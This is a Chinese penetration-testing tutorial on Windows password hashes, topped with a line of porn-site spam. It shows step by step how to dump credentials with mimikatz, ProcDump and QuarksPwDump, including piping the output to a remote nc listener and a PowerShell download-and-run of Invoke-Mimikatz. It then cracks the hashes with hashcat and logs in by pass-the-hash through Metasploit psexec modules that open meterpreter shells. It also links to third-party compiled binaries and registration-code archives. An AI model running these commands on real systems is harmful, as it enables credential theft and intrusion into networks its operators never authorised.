亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

聲明

由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，雷神眾測(cè)以及文章作者不為此承擔(dān)任何責(zé)任。

雷神眾測(cè)擁有對(duì)此文章的修改和解釋權(quán)。如欲轉(zhuǎn)載或傳播此文章，必須保證此文章的完整性，包括版權(quán)聲明等全部?jī)?nèi)容。未經(jīng)雷神眾測(cè)允許，不得任意修改或者增減此文章內(nèi)容，不得以任何方式將其用于商業(yè)目的。

前言

在研究 Hashcat 的時(shí)候涉及到了 windows 的Hash破解，感覺這個(gè)地方還是有一些姿勢(shì)點(diǎn)和細(xì)節(jié)的，特寫此文章記錄之。

No.1

Hash簡(jiǎn)介

Hash 一般翻譯為“散列”，也可直接音譯為“哈希”的。這個(gè)加密函數(shù)對(duì)一個(gè)任意長(zhǎng)度的字符串?dāng)?shù)據(jù)進(jìn)行一次加密函數(shù)運(yùn)算，然后返回一個(gè)固定長(zhǎng)度的字符串。Hash主要用于信息安全領(lǐng)域中加密算法，滲透測(cè)試中獲取目標(biāo)系統(tǒng)的明文或Hash往往是整個(gè)滲透測(cè)試過程中重要的一環(huán)。在Windows系統(tǒng)中本機(jī)用戶的密碼Hash是放在本地的SAM文件里面，域內(nèi)用戶的密碼Hash是存在域控的NTDS.DIT文件里面。

No.2

Windows Hash分類

LM

LM Hash簡(jiǎn)介

LAN Manager（LM）哈希是Windows系統(tǒng)所用的第一種密碼哈希算法，是一種較古老的Hash，在LAN Manager協(xié)議中使用，非常容易通過暴力破解獲取明文憑據(jù)。它只有唯一一個(gè)版本且一直用到了NT LAN Manager（NTLM）哈希的出現(xiàn)，在Windows Vista/Windows 7/Windows Server 2008以及后面的系統(tǒng)中，LM哈希算法是默認(rèn)關(guān)閉的，LM算法是在DES基礎(chǔ)上實(shí)現(xiàn)的，不區(qū)分字母大小寫。

LM Hash生成原理

1.用戶的密碼轉(zhuǎn)換為大寫，密碼轉(zhuǎn)換為16進(jìn)制字符串，不足14字節(jié)將會(huì)用0來再后面補(bǔ)全。

2.密碼的16進(jìn)制字符串被分成兩個(gè)7byte部分。每部分轉(zhuǎn)換成比特流，并且長(zhǎng)度位56bit，長(zhǎng)度不足使用0在左邊補(bǔ)齊長(zhǎng)度

3.再分7bit為一組,每組末尾加0，再組成一組

4.上步驟得到的二組，分別作為key 為 KGS!@# $%進(jìn)行DES加密。

5.將加密后的兩組拼接在一起，得到最終LM HASH值。

LM Hash缺點(diǎn)

1.密碼長(zhǎng)度最大只能為14個(gè)字符

2.密碼不區(qū)分大小寫

3.如果密碼強(qiáng)度是小于7位，那么第二個(gè)分組加密后的結(jié)果肯定是aad3b435b51404ee

4.Des密碼強(qiáng)度不高

NTLM

NTLM Hash簡(jiǎn)介

NT LAN Manager（NTLM）哈希是Windows系統(tǒng)認(rèn)可的另一種算法，用于替代古老的LM-Hash，一般指Windows系統(tǒng)下Security Account Manager（SAM）中保存的用戶密碼hash，在Windows Vista/Windows 7/Windows Server 2008以及后面的系統(tǒng)中，NTLM哈希算法是默認(rèn)啟用的。

NTLM Hash生成原理

1.先將用戶密碼轉(zhuǎn)換為十六進(jìn)制格式。

2.將十六進(jìn)制格式的密碼進(jìn)行Unicode編碼。

3.使用MD4摘要算法對(duì)Unicode編碼數(shù)據(jù)進(jìn)行Hash計(jì)算

Python2 -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "P@ssw0rd".encode("utf-16le")).digest)'

e19ccf75ee54e06b06a5907af13cef42

No.3

Windows Hash抓取

mimikatz

項(xiàng)目地址：

https://github.com/gentilkiwi/mimikatz

Mimikatz是一個(gè)開源的項(xiàng)目，用于Windows下讀取已經(jīng)登錄過的用戶Hash和明文密碼，要順利的讀取密碼必須具有Admin或者System權(quán)限，所以它也是內(nèi)網(wǎng)滲透神器之一。

本地交互式抓取

運(yùn)行mimikatz.exe，彈出mimikatz的窗口，輸入如下命令：

顯示您是否具有適當(dāng)?shù)臋?quán)限來繼續(xù):

mimikatz # privilege::debug

啟動(dòng)日志記錄功能:

mimikatz # log

輸出存儲(chǔ)在此計(jì)算機(jī)上的所有明文密碼:

mimikatz # sekurlsa::logonpasswords

此時(shí)會(huì)在當(dāng)前shell運(yùn)行的目錄下生成mimikatz.log，這里面記錄了抓取密碼的一些詳細(xì)情況。

本地非交互式抓取

在高權(quán)限的CMD命令行下直接運(yùn)行：

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > mimikatz.txt

此時(shí)會(huì)在當(dāng)前shell運(yùn)行的目錄下生成mimikatz.txt，這里面記錄了抓取密碼的一些詳細(xì)情況。

遠(yuǎn)程非交互式抓取

實(shí)驗(yàn)環(huán)境

本次實(shí)驗(yàn)使用ncat來做消息反彈，不知道ncat命令的同學(xué)可以參考我的這篇文章：nc命令學(xué)習(xí)記錄

(https://www.sqlsec.com/2019/10/nc.html)

macOS

macOS本機(jī)提前做好監(jiān)聽:

ncat -lvp 2333

我本人更喜歡ncat命令多一點(diǎn)，具體看個(gè)人喜好。

Windows

這里為了方便我把nc.exe上傳到了mimikatz.exe的同目錄下了：

C:mimikatz_trunk\x64>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit | nc -v 10.211.55.2 2333

DNS fwd/rev mismatch: GG != GG.lan

GG [10.211.55.2] 2333 (?) open

效果

這樣操作完成后，即不在目標(biāo)系統(tǒng)上留下任何文件，直接把抓取到的結(jié)果用nc發(fā)送到指定的遠(yuǎn)程機(jī)，此時(shí)macOS這邊已經(jīng)拿到返回的密碼信息了：

powershell加載mimikatz抓取

目標(biāo)機(jī)器可以連接外網(wǎng)的情況下：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

內(nèi)網(wǎng)的情況下可將腳本下載下來，自己搭建一個(gè)本地的Web服務(wù)器，通過內(nèi)網(wǎng)IP去訪問：

powershell IEX (New-Object Net.WebClient).DownloadString('http://10.211.55.2/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

各個(gè)系統(tǒng)版本的抓取樣本

Windows Server 2003 R2

Authentication Id : 0 ; 420302 (00000000:000669ce)

Session : Interactive from 0

User Name : Administrator

Domain : GG6043

Logon Server : GG6043

Logon Time : 2019-11-18 20:51:21

SID : S-1-5-21-3664143716-1376148344-336540569-500

msv :

[00000002] Primary

* Username : Administrator

* Domain : GG6043

* LM : 896108c0bbf35b5caad3b435b51404ee

* NTLM : f6502cbe4802f94ab472288970c124cd

* SHA1 : 669c9b60b44e10aaa8784563c9a5381c9300235a

wdigest :

* Username : Administrator

* Domain : GG6043

* Password : P@ss123

kerberos :

* Username : Administrator

* Domain : GG6043

* Password : P@ss123

ssp :

credman :

主要有如下的關(guān)鍵信息：

Windows Server 2008 R2

Authentication Id : 0 ; 224455 (00000000:00036cc7)

Session : Interactive from 2

User Name : Administrator

Domain : GGF140

Logon Server : GGF140

Logon Time : 2019/11/18 23:32:08

SID : S-1-5-21-3111474477-815050075-712084324-500

msv :

[00000003] Primary

* Username : Administrator

* Domain : GGF140

* LM : 921988ba001dc8e14a3b108f3fa6cb6d

* NTLM : e19ccf75ee54e06b06a5907af13cef42

* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63

tspkg :

* Username : Administrator

* Domain : GGF140

* Password : P@ssw0rd

wdigest :

* Username : Administrator

* Domain : GGF140

* Password : P@ssw0rd

kerberos :

* Username : Administrator

* Domain : GGF140

* Password : P@ssw0rd

ssp :

credman :

Windows Server 2008 R2 默認(rèn)的配置還是可以讀取到LM類型的Hash的，與網(wǎng)上的理論不符合，說明WIndows Server 2008 R2 與Windows 7 依然沒有完全禁用掉LM類型的Hash

Windows 7 SP1

Authentication Id : 0 ; 2006207 (00000000:001e9cbf)

Session : Interactive from 2

User Name : Administrator

Domain : GG37BE

Logon Server : GG37BE

Logon Time : 2019/11/18 22:36:13

SID : S-1-5-21-1996198258-1617865379-4184567355-500

msv :

[00000003] Primary

* Username : Administrator

* Domain : GG37BE

* LM : 921988ba001dc8e14a3b108f3fa6cb6d

* NTLM : e19ccf75ee54e06b06a5907af13cef42

* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63

tspkg :

* Username : Administrator

* Domain : GG37BE

* Password : P@ssw0rd

wdigest :

* Username : Administrator

* Domain : GG37BE

* Password : P@ssw0rd

kerberos :

* Username : Administrator

* Domain : GG37BE

* Password : P@ssw0rd

ssp :

credman :

主要有如下的關(guān)鍵信息：

Windows 10 1903

Authentication Id : 0 ; 86025756 (00000000:0520a61c)

Session : Interactive from 9

User Name : sqlsec

Domain : MACBOOKPRO

Logon Server : MACBOOKPRO

Logon Time : 2019/11/18 20:06:24

SID : S-1-5-21-2097287409-4065191294-224695044-1000

msv :

[00000003] Primary

* Username : sqlsec

* Domain : MACBOOKPRO

* NTLM : f00a25418f128daaef2bc89ed94416bd

* SHA1 : 56d7741bca89552362fd24d11bb8980e3d8a444c

tspkg :

wdigest :

* Username : sqlsec

* Domain : MACBOOKPRO

* Password :

kerberos :

* Username : sqlsec

* Domain : MACBOOKPRO

* Password :

ssp :

credman :

主要有如下的關(guān)鍵信息：

Windows 10無(wú)法使用mimikatz讀取到明文密碼，只能直接讀取到加密后的NTLM值。

ProcDump + mimikatz

官網(wǎng)地址：ProcDump v9.0

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

ProcDump是一個(gè)命令行程序，可以很方便地將系統(tǒng)正在運(yùn)行的進(jìn)程轉(zhuǎn)存儲(chǔ)生成為dump文件又因?yàn)槭俏④涀约页銎罚钥梢赃^很多殺軟。

dump lsass.exe進(jìn)程

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

x86 x64 分別執(zhí)行對(duì)應(yīng)的可執(zhí)行文件 因?yàn)楸敬螠y(cè)試系統(tǒng)為 64位 故執(zhí)行 procdump64.exe

此時(shí)會(huì)在當(dāng)前shell運(yùn)行的目錄下生成lsass.dmp，這個(gè)是lsass.exe進(jìn)程轉(zhuǎn)存儲(chǔ)的文件，里面記錄了Hash信息。

對(duì)于NT6及其以上的系統(tǒng)也可以使用Windows自帶的功能進(jìn)行dump:

任務(wù)管理器點(diǎn)擊顯示所有用戶的進(jìn)程，然后找到 lsass.exe的進(jìn)程，右鍵，選擇創(chuàng)建轉(zhuǎn)存儲(chǔ)文件

讀取dmp文件信息

將上面轉(zhuǎn)存儲(chǔ)生成的lsass.dmp文件放到mimikatz.exe的同目錄下，執(zhí)行下面非交互命令可以直接讀取密碼：

# 直接讀取明文密碼

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::tspkg" exit

# 讀取明文密碼 + Hash值 信息更全

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit

QuarksPwDump

QuarksPwDump是一個(gè)Win32環(huán)境下系統(tǒng)授權(quán)信息導(dǎo)出工具，支持Windows眾多的OS版本：XP/2003/Vista/7/2008/8 (Windows10 國(guó)光測(cè)試失敗 并沒有成功讀取到Hash)

項(xiàng)目地址：

https://github.com/quarkslab/quarkspwdump

目前作者只是開源了源代碼，沒有發(fā)布已經(jīng)編譯好的版本，所以大家使用的話得寄幾用VS Studio編譯一下。下面國(guó)光本人自己編譯好的版本如下，有需要的朋友可以自行下載：

文件名：QuarksPwDump.exe

https://uijay-my.sharepoint.com/:u:/g/personal/aywtc_myoffice_fun/ETcuCjmWyylJkO8p4dtnJR4BzHbmgb8Nq7musD32XNmbyQ?e=7nAXHn

文件名：VC++2010學(xué)習(xí)版和永久使用注冊(cè)碼.zip

https://uijay-my.sharepoint.com/:u:/g/personal/aywtc_myoffice_fun/EbPp8H8FRL9IkofM35XIn7AB6tASaLPHtT4l3t9e69KxcQ?e=zecfJu)

另外Githun還有其他大牛已經(jīng)編譯好了更新的版本，我們也可以直接下載：

https://github.com/redcanari/quarkspwdump/releases

這個(gè)新的 QuarksPwDumpv_0.3a版本中新增了-sf參數(shù)

QuarksPwDump抓取密碼的命令如下:

QuarksPwDump.exe -dhl -o hash.txt

抓取Hash并在同目錄下生成hash.txt文件，抓取到具體的Hash如下：

Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42:::

提取Administrator用戶的關(guān)鍵密碼信息為：E19CCF75EE54E06B06A5907AF13CEF42，他實(shí)際上是P@ssw0rd的NTLM加密的值，可以用Hashcat來進(jìn)行破解

No.4

HashWindows Hash利用簡(jiǎn)介

Hashcat破解

拿到LM或者NTLM的密文時(shí)，如果沒有明文的時(shí)候，最直接的方法當(dāng)然是直接將其解密啦，這里使用Hashcat來進(jìn)行密碼解密，對(duì)Hashcat這個(gè)工具不了解的同學(xué)可以參考我寫的這篇文章：Hashcat學(xué)習(xí)記錄

https://www.sqlsec.com/2019/10/hashcat.html

假設(shè)我們讀取到Hash如下：

• LM : 921988ba001dc8e14a3b108f3fa6cb6d

• NTLM : e19ccf75ee54e06b06a5907af13cef42

實(shí)際上這個(gè)明文是：P@ssw0rd

下面用Hashcat來簡(jiǎn)單演示一下破解，這里破解我使用了-a 0字典破解，hashcat --help可以看到LM和NTLM對(duì)應(yīng)的hash編號(hào)分別為3000和1000

3000 | LM | Operating Systems

1000 | NTLM | Operating Systems

廢話不多說，下面直接走個(gè)流程破解一下吧：

Hashcat破解LM Hash

hashcat -a 0 -m 3000 --force '921988ba001dc8e14a3b108f3fa6cb6d' password.txt

因?yàn)長(zhǎng)M Hash長(zhǎng)度最長(zhǎng)是14個(gè)字符，密碼被分成2個(gè)長(zhǎng)度為7的字符進(jìn)行存放，所以這里Hashcat破解的時(shí)候也是分2半部分來分別進(jìn)行破解的：

4a3b108f3fa6cb6d:D

921988ba001dc8e1:P@SSW0R

Session..........: hashcat

Status...........: Cracked

Hash.Type........: LM

Hash.Target......: 921988ba001dc8e1, 4a3b108f3fa6cb6d

Time.Started.....: Tue Nov 19 00:05:18 2019 (0 secs)

Time.Estimated...: Tue Nov 19 00:05:18 2019 (0 secs)

Guess.Base.......: File (password.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.# 2.........: 1291 H/s (0.16ms) @ Accel:32 Loops:1 Thr:64 Vec:1

Speed.# 3.........: 0 H/s (0.00ms) @ Accel:1024 Loops:1 Thr:64 Vec:1

Speed.# *.........: 1291 H/s

Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts

Progress.........: 8/8 (100.00%)

Rejected.........: 0/8 (0.00%)

Restore.Point....: 0/8 (0.00%)

Restore.Sub.# 2...: Salt:0 Amplifier:0-1 Iteration:0-1

Restore.Sub.# 3...: Salt:0 Amplifier:0-0 Iteration:0-1

Candidates.# 2....: ADMIN -> D

Candidates.# 3....: [Copying]

可以看到先破解出了：D，然后破解出了P@SSW0 比較蛋疼的是 LM Hash不區(qū)分大小寫，所以我們還得憑感覺去猜出具體的密碼。

Hashcat破解NTLM Hash

hashcat -a 0 -m 1000 --force 'e19ccf75ee54e06b06a5907af13cef42' password.txt

破解成功，得到如下結(jié)果：

e19ccf75ee54e06b06a5907af13cef42:P@ssw0rd

Session..........: hashcat

Status...........: Cracked

Hash.Type........: NTLM

Hash.Target......: e19ccf75ee54e06b06a5907af13cef42

Time.Started.....: Mon Nov 18 23:44:55 2019 (0 secs)

Time.Estimated...: Mon Nov 18 23:44:55 2019 (0 secs)

Guess.Base.......: File (password.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.# 2.........: 0 H/s (0.00ms) @ Accel:64 Loops:1 Thr:64 Vec:1

Speed.# 3.........: 985 H/s (0.06ms) @ Accel:1024 Loops:1 Thr:64 Vec:1

Speed.# *.........: 985 H/s

Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts

Progress.........: 5/5 (100.00%)

Rejected.........: 0/5 (0.00%)

Restore.Point....: 0/5 (0.00%)

Restore.Sub.# 2...: Salt:0 Amplifier:0-0 Iteration:0-1

Restore.Sub.# 3...: Salt:0 Amplifier:0-1 Iteration:0-1

Candidates.# 2....: [Copying]

Candidates.# 3....: admin -> P@ssw0rd

在線Hash破解

Objectif Sécurité - Ophcrack

https://www.objectif-securite.ch/ophcrack

一個(gè)國(guó)外的老牌Hash破解網(wǎng)站，填入NTLM Hash值即可：

CMD5.com

https://cmd5.com

國(guó)內(nèi)的CMD5.com 也支持NTLM類型的Hash破解，直接粘貼進(jìn)去系統(tǒng)會(huì)自動(dòng)解密，也是比較方便的:

還有其他很多的在線網(wǎng)站就不推薦了，這里就只列舉這兩個(gè)用的比較多的網(wǎng)站

Hash傳遞

簡(jiǎn)介

PASS THE Hash也叫Hash傳遞攻擊,簡(jiǎn)稱PTH。模擬用戶登錄不需要用戶明文密碼只需要就可以直接用獲取到的Hash來登錄目標(biāo)系統(tǒng)。

利用成功的前提條件是：

• 開啟445端口 SMB服務(wù)

• 開啟admin$共享

這里目標(biāo)Windows Server 2008 R2（10.211.55.4）通過mimikatz抓取到的Administrator用戶的Hash為：

* LM : 921988ba001dc8e14a3b108f3fa6cb6d

* NTLM : e19ccf75ee54e06b06a5907af13cef42

通過QuarksDump抓取到的Administrator用戶的Hash為：

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42:::

經(jīng)過國(guó)光測(cè)試，在下面Hash傳遞的時(shí)候，只要后面的NTLM Hash是正確的，前面填寫什么都是可以順利登陸成功的，經(jīng)過測(cè)試，如下Hash可以成功：

AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

921988ba001dc8e14a3b108f3fa6cb6d:E19CCF75EE54E06B06A5907AF13CEF42

00000000000000000000000000000000:E19CCF75EE54E06B06A5907AF13CEF42

66666666666666666666666666666666:E19CCF75EE54E06B06A5907AF13CEF42

也就是說:

E19CCF75EE54E06B06A5907AF13CEF42部分起到關(guān)鍵的認(rèn)證作用，前面的只要位數(shù)正確，填寫啥都沒有問題。下面是具體的演示。

Metasploit

Metasploit下面有3個(gè)psexec模塊都可以進(jìn)行Hash傳遞利用，他們分別是：

# 執(zhí)行單個(gè)命令的PTH模塊auxiliary/admin/smb/psexec_command

# 執(zhí)行直接就獲取到meterpreter的PTH模塊exploit/windows/smb/psexec

# 支持對(duì)一個(gè)網(wǎng)段進(jìn)行PTH進(jìn)行驗(yàn)證的模塊exploit/windows/smb/psexec_psh

auxiliary/admin/smb/psexec_command

msf5 > use auxiliary/admin/smb/psexec_command

msf5 auxiliary(admin/smb/psexec_command) > set rhosts 10.211.55.14

rhosts => 10.211.55.14

msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator

smbuser => administrator

msf5 auxiliary(admin/smb/psexec_command) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

msf5 auxiliary(admin/smb/psexec_command) > set command "whoami"command => whoami

msf5 auxiliary(admin/smb/psexec_command) > run

[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...

[*] 10.211.55.14:445 - checking if the file is unlocked

[*] 10.211.55.14:445 - Getting the command output...

[*] 10.211.55.14:445 - Executing cleanup...

[+] 10.211.55.14:445 - Cleanup was successful

[+] 10.211.55.14:445 - Command completed successfully!

[*] 10.211.55.14:445 - Output for "whoami":

nt authoritysystem

[*] 10.211.55.14:445 - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

比較雞肋的是，這個(gè)模塊不支持網(wǎng)段格式批量驗(yàn)證，所以實(shí)戰(zhàn)中可以考慮下面兩個(gè)模塊

exploit/windows/smb/psexec

支持網(wǎng)段格式的IP，方便批量驗(yàn)證PTH，下面是單個(gè)驗(yàn)證過程：

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > set rhosts 10.211.55.14

rhosts => 10.211.55.14

msf5 exploit(windows/smb/psexec) > set smbuser administrator

smbuser => administrator

msf5 exploit(windows/smb/psexec) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

msf5 exploit(windows/smb/psexec) > set lhost 10.211.55.4

lhost => 10.211.55.4

msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.211.55.4:4444

[*] 10.211.55.14:445 - Connecting to the server...

[*] 10.211.55.14:445 - Authenticating to 10.211.55.14:445 as user 'administrator'...

[*] 10.211.55.14:445 - Selecting PowerShell target

[*] 10.211.55.14:445 - Executing the payload...

[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...

[*] Sending stage (179779 bytes) to 10.211.55.14

[*] Meterpreter session 2 opened (10.211.55.4:4444 -> 10.211.55.14:49168) at 2019-11-24 23:42:38 +0800

meterpreter >

下面網(wǎng)段批量驗(yàn)證效果，在內(nèi)網(wǎng)當(dāng)做這樣驗(yàn)證還是比較實(shí)用高效的：

關(guān)于前面32位的Hash不起作用的疑問，去T00ls論壇提問了，下面是師傅們的解答：

iceword：前面是lm hash，lm hash已經(jīng)被棄用了，不用來驗(yàn)證，所以添啥都行

Hello_C：NTLM Hash = LM Hash + NT Hash，LM Hash是aad3b435b51404eeaad3b435b51404ee時(shí)，可能密碼為空或者沒有存儲(chǔ)lm hash，2008默認(rèn)不存儲(chǔ)lm hash。pth 用nt hash，有些工具可能需要lm hash:nt hash格式，沒有l(wèi)m hash可以使用任意32個(gè)字符填充。

安全客：如果空密碼或者不儲(chǔ)蓄LM Hash的話，我們抓到的LM Hash是AAD3B435B51404EEAAD3B435B51404EE。所以在win7 中我們看到抓到LM Hash都是AAD3B435B51404EEAAD3B435B51404EE，這里的LM Hash并沒有價(jià)值。

exploit/windows/smb/psexec_psh

msf5 > use exploit/windows/smb/psexec_psh

msf5 exploit(windows/smb/psexec_psh) > set rhosts 10.211.55.14

rhosts => 10.211.55.14

msf5 exploit(windows/smb/psexec_psh) > set smbuser administrator

smbuser => administrator

msf5 exploit(windows/smb/psexec_psh) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42

msf5 exploit(windows/smb/psexec_psh) > set lhost 10.211.55.4

lhost => 10.211.55.4

msf5 exploit(windows/smb/psexec_psh) > run

[*] Started reverse TCP handler on 10.211.55.4:4444

[*] 10.211.55.14:445 - Executing the payload...

[+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...

[*] Sending stage (179779 bytes) to 10.211.55.14

[*] Meterpreter session 3 opened (10.211.55.4:4444 -> 10.211.55.14:49169) at 2019-11-24 23:44:12 +0800

meterpreter >

這個(gè)模塊也支持網(wǎng)段批量驗(yàn)證，這里就不再贅述了。

No.5

參考資料

幾種windows本地hash值獲取和破解詳解

https://www.secpulse.com/archives/65256.html

抓取 Windows 用戶或者域用戶 hash 的多種姿勢(shì)

https://s.yl0.org/2018/10/18/%E6%8A%93hash.html

mimikatz 用法小記 [ 非交互抓取本地密碼明文及hash ]

https://klionsec.github.io/2016/07/23/mimikatz-one/

利用procdump+Mimikatz 繞過殺軟獲取Windows明文密碼

http://www.91ri.org/6881.html

Windows密碼抓取總結(jié)

https://times0ng.github.io/2018/04/20/Windows密碼抓取總結(jié)/

關(guān)于系統(tǒng)密碼抓取

https://www.cnblogs.com/zhaijiahui/p/8994482.html

后滲透之meterpreter使用攻略

https://xz.aliyun.com/t/2536

Windows內(nèi)網(wǎng)協(xié)議學(xué)習(xí)NTLM篇之NTLM基礎(chǔ)介紹

https://www.anquanke.com/post/id/193149